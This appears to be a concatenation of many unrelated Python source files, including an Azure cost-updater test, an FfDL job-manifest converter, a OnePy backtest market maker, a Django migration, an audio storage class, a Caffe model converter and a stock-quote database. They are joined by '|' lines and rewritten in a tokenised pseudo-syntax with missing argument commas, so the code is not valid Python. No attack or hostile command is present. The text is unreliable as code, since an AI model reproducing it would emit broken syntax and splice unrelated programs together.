# SPDX-License-Identifier: Apache-2.0
#
"""Test the AzureCostModelCostUpdater object."""<import_from_stmt>masu.database.azure_report_db_accessor AzureReportDBAccessor<import_from_stmt>masu.external.date_accessor DateAccessor<import_from_stmt>masu.processor.azure.azure_cost_model_cost_updater AzureCostModelCostUpdater<import_from_stmt>masu.test MasuTestCase<class_stmt>AzureCostModelCostUpdaterTest(MasuTestCase)<block_start>"""Test Cases for the AzureCostModelCostUpdater object."""<def_stmt>test_azure_update_summary_cost_model_costs self<block_start>"""Test to verify Azure derived cost summary is calculated."""<line_sep>updater=AzureCostModelCostUpdater(schema=self.schema provider=self.azure_provider)<line_sep>start_date=DateAccessor().today_with_timezone("UTC")<line_sep>bill_date=start_date.replace(day=1).date()<line_sep>updater.update_summary_cost_model_costs()<with_stmt>AzureReportDBAccessor(self.schema)<as>accessor<block_start>bill=accessor.get_cost_entry_bills_by_date(bill_date)[0]<line_sep>self.assertIsNotNone(bill.derived_cost_datetime)<block_end><block_end><block_end>
|
print('Hello Waldo!')<line_sep>
|
#
# Copyright 2017-2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>json<import_from_stmt>ruamel.yaml YAML<import_stmt>sys<import_stmt>getopt<line_sep>#global variables
language=''<line_sep>inputfile=''<line_sep>outputfile=''<line_sep>samplefile=''<line_sep>yaml=YAML(typ='safe')<def_stmt>getFfDL <block_start><try_stmt><block_start>f=open(inputfile "r")<line_sep>response=f.read()<line_sep>data=yaml.load(response)<line_sep>f.close()<line_sep><return>data<block_end><except_stmt><block_start>print("Missing {}".format(inputfile))<block_end><block_end><def_stmt>getSampleJob <block_start><try_stmt><block_start><if_stmt>samplefile<block_start>f=open(samplefile "r")<block_end><else_stmt><block_start>f=open("sample-FfDL.yaml" "r")<block_end>response=f.read()<line_sep>resYaml=yaml.load(response)<line_sep>f.close()<line_sep><return>resYaml<block_end><except_stmt><block_start>print("Missing sample-FfDL.yaml")<block_end><block_end><def_stmt>createJob sample data<block_start><try_stmt><block_start>sample['framework']['name']=data['model_definition']['framework']['name']<line_sep>sample['name']=data['model_definition']['name']<line_sep>sample['description']=data['model_definition']['description']<line_sep>sample['framework']['command']=data['model_definition']['execution']['command']<line_sep>sample['data_stores'][0]['id']=data['training_data_reference']['name']<line_sep>sample['data_stores'][0]['connection']['auth_url']=data['training_data_reference']['connection']['endpoint_url']<line_sep>sample['data_stores'][0]['connection']['user_name']=data['training_data_reference']['connection']['access_key_id']<line_sep>sample['data_stores'][0]['connection']['password']=data['training_data_reference']['connection']['secret_access_key']<line_sep>sample['data_stores'][0]['training_data']['container']=data['training_data_reference']['source']['bucket']<line_sep>sample['data_stores'][0]['training_results']['container']=data['training_results_reference']['target']['bucket']<line_sep>py2=<false><line_sep>CPU=<false><try_stmt><block_start><if_stmt>data['model_definition']['framework']['name']<eq>'tensorflow'<block_start><if_stmt>'2.'<in>data['model_definition']['framework']['runtimes']['version']<block_start>py2=<true><block_end><block_end><block_end><except_stmt><block_start>py2=<false><block_end><try_stmt><block_start>sample['learners']=int(data['model_definition']['execution']['compute_configuration']['nodes'])<block_end><except_stmt><block_start>sample['learners']=1<block_end># Detect T-shirt requirements
<if_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80"<block_start>sample['cpus']=4<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"p100"<block_start>sample['cpus']=8<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"v100"<block_start>sample['cpus']=26<line_sep>sample['gpus']=1<line_sep>sample['memory']='24Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80x2"<block_start>sample['cpus']=8<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"p100x2"<block_start>sample['cpus']=16<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"v100x2"<block_start>sample['cpus']=52<line_sep>sample['gpus']=2<line_sep>sample['memory']='48Gb'<block_end><elif_stmt>data['model_definition']['execution']['compute_configuration']['name']<eq>"k80x4"<block_start>sample['cpus']=16<line_sep>sample['gpus']=4<line_sep>sample['memory']='96Gb'<block_end><else_stmt><block_start>CPU=<true><line_sep>sample['cpus']=1<line_sep>sample['gpus']=0<line_sep>sample['memory']='1Gb'<block_end># Detect Framework version
<try_stmt><block_start><if_stmt>data['model_definition']['framework']['name']<eq>'tensorflow'<block_start><if_stmt>'1.3'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.3.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.3.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.3.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.3.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.4'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.4.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.4.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.4.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.4.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.5'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.5.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.5.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.5.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.5.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.6'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.6.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.6.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.6.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.6.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.7'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.7.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.7.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.7.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.7.0-gpu-py3"<block_end><block_end><block_end><else_stmt><block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="latest"<block_end><else_stmt><block_start>sample['framework']['version']="latest-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="latest-py3"<block_end><else_stmt><block_start>sample['framework']['version']="latest-gpu-py3"<block_end><block_end><block_end><block_end><elif_stmt>data['model_definition']['framework']['name']<eq>'caffe'<block_start><if_stmt>CPU<block_start>sample['framework']['version']="cpu"<block_end><else_stmt><block_start>sample['framework']['version']="gpu"<block_end><block_end><elif_stmt>data['model_definition']['framework']['name']<eq>'pytorch'<block_start>sample['framework']['version']="latest"<block_end><block_end><except_stmt><block_start>print("Wrong framework.version contents in {}".format(inputfile))<block_end><if_stmt>data['model_definition']['framework']['name']<ne>"tensorflow"<block_start>sample.pop('evaluation_metrics' 
<none>)<block_end><block_end><except_stmt><block_start>print("Missing contents in {}".format(inputfile))<block_end><try_stmt><block_start><if_stmt>outputfile<block_start>f=open(outputfile "w")<block_end><else_stmt><block_start>f=open("manifest-FfDL.yaml" "w")<block_end>yaml.default_flow_style=<false><line_sep>yaml.dump(sample f)<line_sep>f.close()<block_end><except_stmt><block_start><if_stmt>outputfile<block_start>print("Cannot write contents to {}".format(outputfile))<block_end><else_stmt><block_start>print("Cannot write contents to manifest-FfDL.yaml.")<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>argv=sys.argv[1:]<try_stmt><block_start>opts,args=getopt.getopt(argv "i:o:s:" ["ifile=" "ofile=" "sfile="])<block_end><except_stmt>getopt.GetoptError<block_start>print('Format Error: Wrong format.')<line_sep>print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')<line_sep>sys.exit(2)<block_end><for_stmt>opt,arg opts<block_start><if_stmt>opt<in>("-i" "--ifile")<block_start>inputfile=arg<block_end><elif_stmt>opt<in>("-o" "--ofile")<block_start>outputfile=arg<block_end><elif_stmt>opt<in>("-s" "--sfile")<block_start>samplefile=arg<block_end><block_end><if_stmt><not>inputfile<block_start>print('Input Error: inputfile cannot be empty.')<line_sep>print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')<line_sep>sys.exit(2)<block_end>data=getFfDL()<line_sep>sample=getSampleJob()<line_sep>createJob(sample data)<block_end>
|
<import_stmt>arrow<import_from_stmt>OnePy.constants EVENT<import_from_stmt>OnePy.sys_module.components.exceptions BacktestFinished BlowUpError <import_from_stmt>OnePy.sys_module.metabase_env OnePyEnvBase<import_from_stmt>OnePy.sys_module.models.base_bar BarBase<import_from_stmt>OnePy.sys_module.models.calendar Calendar<class_stmt>MarketMaker(OnePyEnvBase)<block_start>calendar:Calendar=<none><line_sep>@classmethod<def_stmt>update_market cls<block_start><try_stmt><block_start>cls.env.cur_suspended_tickers.clear()<line_sep>cls.calendar.update_calendar()<line_sep>cls._update_bar()<line_sep>cls._update_recorder()<line_sep>cls._check_blowup()<line_sep>cls.env.event_engine.put(EVENT.Market_updated)<block_end><except_stmt>(BacktestFinished BlowUpError)<block_start>cls._update_recorder(final=<true>)# when the backtest ends, update account info using the close price
<raise>BacktestFinished<block_end><block_end>@classmethod<def_stmt>initialize cls<block_start>cls.env.logger.critical(f"Initializing OnePy")<line_sep>cls._initialize_calendar()<line_sep>cls._initialize_feeds()<line_sep>cls._initialize_cleaners()<line_sep>cls.env.logger.critical(f"{'='<times>15} OnePy initialized successfully! {'='<times>15}")<line_sep>cls.env.logger.critical("Starting the journey to find One Piece~~~")<block_end>@classmethod<def_stmt>_initialize_calendar cls<block_start>cls.calendar=Calendar(cls.env.instrument)<block_end>@classmethod<def_stmt>_initialize_feeds cls<block_start><for_stmt>value list(cls.env.readers.values())<block_start><if_stmt>value.ticker# readers keyed by name rather than by ticker are not initialized as tickers
<block_start>ohlc_bar=cls.get_bar(value.ticker cls.env.sys_frequency)<if_stmt>ohlc_bar.initialize(buffer_day=7)<block_start>cls.env.tickers.append(value.ticker)<line_sep>cls.env.feeds.update({value.ticker:ohlc_bar})<block_end><block_end><block_end><block_end>@classmethod<def_stmt>_initialize_cleaners cls<block_start><for_stmt>ticker list(cls.env.tickers)<block_start><for_stmt>cleaner list(cls.env.cleaners.values())<block_start>bufferday=cleaner.buffer_day<line_sep>cleaner.initialize_buffer_data(ticker bufferday)<block_end><block_end><block_end>@classmethod<def_stmt>_update_recorder cls final=<false><block_start><for_stmt>recorder cls.env.recorders.values()<block_start>recorder.update(order_executed=final)<block_end><block_end>@classmethod<def_stmt>_check_blowup cls<block_start><if_stmt>cls.env.recorder.balance.latest()<le>0<block_start>cls.env.logger.critical("The account is BLOW UP!")<line_sep><raise>BlowUpError<block_end><block_end>@classmethod<def_stmt>_update_bar cls<block_start><for_stmt>ticker cls.env.tickers<block_start>iter_bar=cls.env.feeds[ticker]<try_stmt><block_start>iter_bar.next()<block_end><except_stmt>StopIteration<block_start>todate=arrow.get(cls.env.todate).format("YYYY-MM-DD HH:mm:ss")<if_stmt>cls.env.sys_date<eq>todate<block_start><if_stmt>cls.env.is_show_today_signals<block_start>iter_bar.move_next_ohlc_to_cur_ohlc()<block_end><else_stmt><block_start><raise>BacktestFinished<block_end><block_end><else_stmt><block_start>cls.env.cur_suspended_tickers.append(ticker)<line_sep>cls.env.suspended_tickers_record[ticker].append(cls.env.sys_date)<block_end><block_end><block_end><block_end>@classmethod<def_stmt>get_bar cls ticker frequency<arrow>BarBase<block_start><return>cls.env.recorder.bar_class(ticker frequency)<block_end><block_end>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>uuid<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('wooey' '0013_wooeyjob_uuid_populate') ]<line_sep>operations=[# Set to unique=True
migrations.AlterField(model_name='wooeyjob' name='uuid' field=models.CharField(default=uuid.uuid4 unique=<true> max_length=255) ) ]<block_end>
|
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>numpy<as>np<import_from_stmt>copy deepcopy<import_from_stmt>gym.spaces.box Box<import_stmt>inspect<import_from_stmt>utils.helpers Experience# NOTE: here state0 is always "None"
<import_from_stmt>utils.helpers preprocessAtari rgb2gray rgb2y scale<import_from_stmt>core.env Env<class_stmt>LabEnv(Env)<block_start><def_stmt>__init__ self args env_ind=0<block_start>super(LabEnv self).__init__(args env_ind)<assert_stmt>self.env_type<eq>"lab"<block_end><block_end>
|
<import_stmt>io<import_stmt>logging<import_stmt>os.path<import_from_stmt>aim.sdk.num_utils inst_has_typename<import_from_stmt>aim.sdk.objects.io wavfile<import_from_stmt>aim.storage.object CustomObject<import_from_stmt>aim.storage.types BLOB<line_sep>logger=logging.getLogger(__name__)<line_sep>@CustomObject.alias('aim.audio')<class_stmt>Audio(CustomObject)<block_start>"""Audio object used to store audio objects in an Aim repository.
Currently, audio formats are limited to mp3, wav, flac
Args:
data: file path, bytes, io.BytesIO or numpy.array (only for WAV)
format (:obj:`str`): Format of the audio source
rate (:obj:`int`): Rate of the audio file, for WAV defaults to 22500
caption (:obj:`str`, optional): Optional audio caption. '' by default.
"""<line_sep>AIM_NAME='aim.audio'<line_sep># supported audio formats
UNKNOWN=''<line_sep>MP3='mp3'<line_sep>WAV='wav'<line_sep>FLAC='flac'<line_sep>audio_formats=(MP3 WAV FLAC)<def_stmt>__init__ self data format:str='' caption:str='' rate:int=<none><block_start>super().__init__()<line_sep>audio_format=format.lower()<if_stmt>inst_has_typename(data ['ndarray.numpy'])# Currently, only WAV audio formats are supported for numpy
<block_start>audio_format=self.WAV<if_stmt><not>rate<block_start>rate=22500<line_sep>logger.info(f'Parameter "rate" is not provided! Using default: {rate}')<block_end>bs=wavfile.write(rate data)<line_sep>data=bs<block_end># act as a regular file with enforced audio format definition by user side
<if_stmt><not>audio_format<block_start><raise>ValueError('Audio format must be provided.')<block_end><elif_stmt>audio_format<not><in>self.audio_formats<block_start><raise>ValueError(f'Invalid audio format is provided. Must be one of {self.audio_formats}')<block_end><if_stmt>isinstance(data str)<block_start><if_stmt><not>os.path.exists(data)<or><not>os.path.isfile(data)<block_start><raise>ValueError('Invalid audio file path')<block_end><with_stmt>open(data 'rb')<as>FS<block_start>data=FS.read()<block_end><block_end><elif_stmt>isinstance(data io.BytesIO)<block_start>data=data.read()<block_end><if_stmt><not>isinstance(data bytes)<block_start><raise>TypeError('Content is not a byte-stream object')<block_end>extra={'caption':caption 'format':audio_format}<line_sep>self._prepare(data **extra)<block_end><def_stmt>_prepare self data **extra<arrow><none><block_start><assert_stmt>isinstance(data bytes)<for_stmt>k,v extra.items()<block_start>self.storage[k]=v<block_end>self.storage['data']=BLOB(data=data)<block_end><def_stmt>to_numpy self<block_start>"""
This method converts WAV to Numpy array.
Other audio formats are not supported at this moment.
Returns: numpy array
"""<assert_stmt>self.storage['format']<eq>self.__audio_format_map[self.WAV]<line_sep><return>wavfile.read(self.get())<block_end><def_stmt>get self<arrow>io.BytesIO<block_start>"""
Reads data from the inner container and writes it to a buffer
Returns: io.BytesIO
"""<line_sep>bs=self.storage.get('data')<if_stmt><not>bs<block_start><return>io.BytesIO()<block_end><return>io.BytesIO(bytes(bs))<block_end><block_end>
|
<import_stmt>os<import_stmt>os.path<as>osp<import_stmt>sys<import_stmt>google.protobuf<as>pb<import_from_stmt>argparse ArgumentParser<import_stmt>numpy<as>np<import_stmt>shutil<import_stmt>caffe<import_from_stmt>caffe.proto caffe_pb2<line_sep>sys.path.append('waifu2x-chainer')<import_from_stmt>lib srcnn<import_stmt>chainer<def_stmt>main <block_start>caffe.set_mode_cpu()<line_sep>model_name='UpResNet10'<line_sep>model_dir='waifu2x-chainer/models/{}'.format(model_name.lower())<line_sep>model_class=srcnn.archs[model_name]<for_stmt>filename os.listdir(model_dir)<block_start>basename,ext=os.path.splitext(filename)<if_stmt>ext<eq>'.npz'<block_start>model_path=os.path.join(model_dir filename)<line_sep>print(model_path)<line_sep>channels=3<if>'rgb'<in>filename<else>1<line_sep>model=model_class(channels)<line_sep>chainer.serializers.load_npz(model_path model)<line_sep>model.to_cpu()<line_sep>params={}<for_stmt>path,param model.namedparams()<block_start>params[path]=param.array<block_end>net=caffe.Net('upresnet10_3.prototxt' caffe.TEST)<for_stmt>key net.params<block_start>l=len(net.params[key])<line_sep>net.params[key][0].data[<ellipsis>]=params[key+'/W']<if_stmt>l<ge>2<block_start>net.params[key][1].data[<ellipsis>]=params[key+'/b']<block_end><block_end>input_data=np.empty(net.blobs['input'].data.shape dtype=np.float32)<line_sep>input_data[<ellipsis>]=np.random.random_sample(net.blobs['input'].data.shape)<line_sep>net.blobs['input'].data[<ellipsis>]=input_data<line_sep>ret=net.forward()<line_sep>input_data=np.empty(net.blobs['input'].data.shape dtype=np.float32)<line_sep>input_data[<ellipsis>]=np.random.random_sample(net.blobs['input'].data.shape)<line_sep>net.blobs['input'].data[<ellipsis>]=input_data<line_sep>ret=net.forward()<line_sep>batch_y=model(input_data)<line_sep>print(batch_y.array-ret['/conv_post'])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>caffe.init_log(3)<line_sep>main()<block_end>
|
"""
Random code for testing purposes
"""<import_from_stmt>pathlib Path<import_stmt>subprocess<as>sp<import_from_stmt>p_tqdm p_map<import_stmt>numpy<as>np<def_stmt>run_tractseg subject_id# dir = base / subject_id
<block_start>dir=base/subject_id/"session_1"<line_sep># sp.call(f"TractSeg -i {dir}/peaks.nii.gz --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type endings_segmentation --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type TOM --preview", shell=True)
sp.call(f"Tracking -i {dir}/peaks.nii.gz --tracking_format tck --algorithm prob --test 3" shell=<true>)<line_sep># sp.call(f"Tractometry -i {dir}/tractseg_output/TOM_trackings " +
# f"-o {dir}/tractseg_output/Tractometry.csv " +
# f"-e {dir}/tractseg_output/endings_segmentations -s {dir}/FA.nii.gz --tracking_format tck",
# shell=True)
<block_end><if_stmt>__name__<eq>'__main__'# base = Path("/mnt/nvme/data/dwi/tractometry_test_subjectSpace")
<block_start>base=Path("/mnt/nvme/data/dwi/tractseg_example")<line_sep># base = Path("/mnt/nvme/data/dwi/rotation_test")
# subjects = ["s01", "s02", "s03", "s04"]
subjects=["s01"]<line_sep># subjects = ["UZB"]
<def_stmt>process_subject subject_id<block_start>run_tractseg(subject_id)<block_end>p_map(process_subject subjects num_cpus=1 disable=<false>)<line_sep># Run Tractometry statistics
# cd /mnt/nvme/data/dwi/tractometry_test
# plot_tractometry_results -i subjects.txt -o tractometry_result_group.png --mc --save_csv --plot3D metric
<block_end>
|
""""
Copyright 2019 by <NAME> (jwag). All rights reserved.
:license: MIT, see LICENSE for more details.
This package contains OPTIONAL models for various ORMs/databases that can be used
to quickly get the required DB models setup.
These models have the fields for ALL features. This makes it easy for applications
to add features w/o a DB migration (and modern DBs are pretty efficient at storing
empty values!).
"""<line_sep>
|
"""Cheroot is the high-performance, pure-Python HTTP server used by CherryPy."""<try_stmt><block_start><import_stmt>pkg_resources<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start>__version__=pkg_resources.get_distribution('cheroot').version<block_end><except_stmt>Exception<block_start>__version__='unknown'<block_end>
|
<import_stmt>datetime<import_stmt>logging<import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>sqlalchemy create_engine and_<import_from_stmt>sqlalchemy.orm sessionmaker<import_from_stmt>yahoo_finance Share YQLResponseMalformedError<import_from_stmt>stocklook.utils.formatters get_stock_data field_map get_stock_data_historical<import_from_stmt>.tables Quote Stock Base WatchList<line_sep>logger=logging.getLogger()<line_sep>logger.setLevel(logging.INFO)<line_sep>DATA_DIR=os.path.join(os.path.dirname(os.path.dirname(__file__)) 'data')<if_stmt><not>os.path.exists(DATA_DIR)<block_start>os.mkdir(DATA_DIR)<block_end>DEFAULT_DATABASE_PATH=os.path.join(DATA_DIR 'db.sqlite3')<line_sep>engine=create_engine('sqlite:///'+DEFAULT_DATABASE_PATH)<line_sep>Session=sessionmaker(bind=engine)<line_sep>stock_keys=Stock.__dict__.keys()<line_sep>quote_keys=Quote.__dict__.keys()<class_stmt>StockDatabase<block_start>STOCK_TIMES=[[5 30] [13 30]]<def_stmt>__init__ self symbols=<none><block_start>Base.metadata.create_all(bind=engine checkfirst=<true>)<line_sep>self._symbols=symbols<block_end><def_stmt>_add_stock self session name data=<none><block_start><if_stmt>data<is><none><block_start><try_stmt><block_start>data=get_stock_data(Share(name) field_map)<block_end><except_stmt><block_start><return><none><block_end><block_end>stock=Stock(**{k:v<for>k,v data.items()<if>k<in>stock_keys})<try_stmt><block_start>session.add(stock)<block_end><except_stmt><block_start><pass><block_end><return>data<block_end><def_stmt>seconds_until_market_open self<block_start>open,close=self.STOCK_TIMES<line_sep>ohour,omin=open<line_sep>chour,cmin=close<line_sep>osec=(ohour<times>60<times>60)+(omin<times>60)<line_sep>csec=(chour<times>60<times>60)+(cmin<times>60)<line_sep>today=datetime.datetime.now()<line_sep>tsec=(today.hour<times>60<times>60)+(today.minute<times>60)<line_sep>weekday=today.weekday()<if_stmt>weekday<l>5<block_start>add=0<block_end><elif_stmt>weekday<eq>5<block_start>add=(48<times>60<times>60)-tsec<block_end><elif_stmt>weekday<eq>6<block_start>add=(24<times>60<times>60)-tsec<block_end><if_stmt>tsec<g>csec<block_start>sec=(24<times>60<times>60)-tsec+osec+add<line_sep>#logger.info("STMO1: Stock market opens in {} hours".format(round(sec/60/60),2))
<block_end><elif_stmt>tsec<l>osec<block_start>sec=osec-tsec+add<line_sep>#logger.info("STMO2: Stock market opens in {} hours".format(round(sec / 60 / 60), 2))
<block_end><else_stmt>#logger.info("STMO3: Stock market is currently open")
<block_start>sec=0+add<block_end><return>sec<block_end><def_stmt>get_quote_latest self session stock<block_start><return>session.query(Quote).filter(Quote.stock_id<eq>stock.id).order_by(Quote.date_inserted.desc()).limit(1).one_or_none()<block_end><def_stmt>get_quote self session stock data=<none><block_start>update_time=pd.Timestamp(datetime.datetime.now())-pd.DateOffset(minutes=15)<if_stmt>stock<is><none><or><not>hasattr(stock 'quotes')<or><not>hasattr(stock 'symbol')<block_start><return><none><block_end>seconds=self.seconds_until_market_open()<line_sep>quote=self.get_quote_latest(session stock)<line_sep>market_closed=(seconds<g>15<times>60)<if_stmt>quote<is><none><or>(<not>market_closed<and>quote.date_inserted<le>update_time)<or>(market_closed<and>quote.date_inserted.minute<l>30<and>quote.date_inserted.hour<eq>13)<block_start><if_stmt>data<is><none><block_start>data=get_stock_data(Share(stock.symbol) field_map)<block_end>quote=Quote(**{k:v<for>k,v data.items()<if>k<in>quote_keys})<line_sep>logger.info("UPDATED QUOTE: {}".format(quote))<line_sep>stock.quotes.append(quote)<block_end><else_stmt><block_start>logging.info("EXISTING QUOTE: {}".format(quote))<block_end><return>quote<block_end><def_stmt>get_quotes self session stocks<block_start><return>[self.get_quote(session s)<for>s stocks]<block_end><def_stmt>get_stock self session symbol<block_start>symbol=symbol.upper()<line_sep>query=session.query(Stock).filter(Stock.symbol<eq>symbol)<line_sep>stock=query.one_or_none()<if_stmt>stock<is><none><block_start>self._add_stock(session symbol)<block_end><else_stmt><block_start><return>stock<block_end><return>query.one_or_none()<block_end><def_stmt>get_stocks self session symbols<block_start><return>[self.get_stock(session s)<for>s symbols]<block_end><def_stmt>get_session self<block_start><return>Session()<block_end><def_stmt>update_stocks self session stocks=<none><block_start><if_stmt><not>stocks<block_start>stocks=session.query(Stock).all()<block_end><try_stmt><block_start><return>self.get_quotes(session stocks)<block_end><except_stmt>Exception<as>e<block_start>logger.error("Error getting quotes: {}".format(e))<line_sep>session.rollback()<block_end><block_end><def_stmt>update_historical self session stock start_date end_date<block_start>share=Share(stock.symbol)<try_stmt><block_start>data=get_stock_data_historical(share start_date end_date)<block_end><except_stmt>YQLResponseMalformedError<as>e<block_start>logger.error(e)<line_sep><return><none><block_end>matching_quotes=session.query(Quote).filter(and_(Quote.stock_id<eq>stock.id Quote.date_last_traded<ge>pd.Timestamp(start_date) Quote.date_last_traded<le>pd.Timestamp(end_date))).order_by(Quote.date_inserted.asc())<line_sep>dates=[pd.Timestamp(q.date_last_traded).date()<for>q matching_quotes.all()<if>pd.Timestamp(q.date_last_traded).hour<g>13]<line_sep>quotes=[]<for_stmt>record data<block_start><try_stmt><block_start><if_stmt>record[Quote.date_last_traded.name].date()<not><in>dates<block_start>quote=Quote(**{k:v<for>k,v record.items()<if>k<in>quote_keys})<line_sep>quote.symbol_name=stock.symbol_name<line_sep>quote.stock_exchange=stock.stock_exchange<line_sep>quote.trade_currency=stock.trade_currency<line_sep>quotes.append(quote)<line_sep>stock.quotes.append(quote)<block_end><block_end><except_stmt>(KeyError ValueError)<as>e<block_start>logger.error("Error parsing historical quote - {} - {}".format(e record))<block_end><block_end>[session.add(q)<for>q quotes]<line_sep><return>quotes<block_end><def_stmt>update_historicals self session 
stocks=<none> start_date=<none> end_date=<none><block_start>now=pd.Timestamp(datetime.datetime.now())<if_stmt>start_date<is><none><block_start>start_date=now-pd.DateOffset(years=1)<block_end><if_stmt>end_date<is><none><block_start>end_date=now<block_end><return>[self.update_historical(session s start_date end_date)<for>s stocks]<block_end><def_stmt>get_watchlist self session name<block_start><return>session.query(WatchList).filter(WatchList.name<eq>name).one_or_none()<block_end><def_stmt>add_watchlist self session name tickers=<none><block_start>exists=self.get_watchlist(session name)<if_stmt>exists<is><none><block_start>w=WatchList(name=name)<line_sep>session.add(w)<block_end><else_stmt><block_start>w=exists<block_end><if_stmt>tickers<is><not><none><block_start>stocks=self.get_stocks(session tickers)<for_stmt>s stocks<block_start><if_stmt>s<in>w.stocks<block_start><continue><block_end>w.stocks.append(s)<block_end><block_end><return>w<block_end><def_stmt>delete_watchlist self session name<block_start>session.query(WatchList).filter(WatchList.name<eq>name).delete()<block_end><def_stmt>add_watchlist_stocks self session watchlist tickers<block_start>stocks=self.get_stocks(session tickers)<for_stmt>s stocks<block_start><if_stmt>s<in>watchlist.stocks<block_start><continue><block_end>watchlist.stocks.append(s)<block_end><block_end><def_stmt>delete_watchlist_stocks self session watchlist tickers<block_start><for_stmt>stock watchlist.stocks<block_start><if_stmt>stock.symbol<in>tickers<block_start>session.delete(stock)<block_end><block_end><return>watchlist<block_end><block_end>
|
<import_from_stmt>itertools product<import_stmt>numpy<as>np<import_from_stmt>scipy.spatial.distance cosine<import_from_stmt>shorttext.utils tokenize<def_stmt>jaccardscore_sents sent1 sent2 wvmodel sim_words=<lambda>vec1 vec2:1-cosine(vec1 vec2)<block_start>""" Compute the Jaccard score between sentences based on their word similarities.
:param sent1: first sentence
:param sent2: second sentence
:param wvmodel: word-embedding model
:param sim_words: function for calculating the similarities between a pair of word vectors (default: cosine)
:return: soft Jaccard score
:type sent1: str
:type sent2: str
:type wvmodel: gensim.models.keyedvectors.KeyedVectors
:type sim_words: function
:rtype: float
"""<line_sep>tokens1=tokenize(sent1)<line_sep>tokens2=tokenize(sent2)<line_sep>tokens1=list(filter(<lambda>w:w<in>wvmodel tokens1))<line_sep>tokens2=list(filter(<lambda>w:w<in>wvmodel tokens2))<line_sep>allowable1=[<true>]<times>len(tokens1)<line_sep>allowable2=[<true>]<times>len(tokens2)<line_sep>simdict={(i j):sim_words(wvmodel[tokens1[i]] wvmodel[tokens2[j]])<for>i,j product(range(len(tokens1)) range(len(tokens2)))}<line_sep>intersection=0.0<line_sep>simdictitems=sorted(simdict.items() key=<lambda>s:s[1] reverse=<true>)<for_stmt>idxtuple,sim simdictitems<block_start>i,j=idxtuple<if_stmt>allowable1[i]<and>allowable2[j]<block_start>intersection<augadd>sim<line_sep>allowable1[i]=<false><line_sep>allowable2[j]=<false><block_end><block_end>union=len(tokens1)+len(tokens2)-intersection<if_stmt>union<g>0<block_start><return>intersection/union<block_end><elif_stmt>intersection<eq>0<block_start><return>1.<block_end><else_stmt><block_start><return>np.inf<block_end><block_end>
|
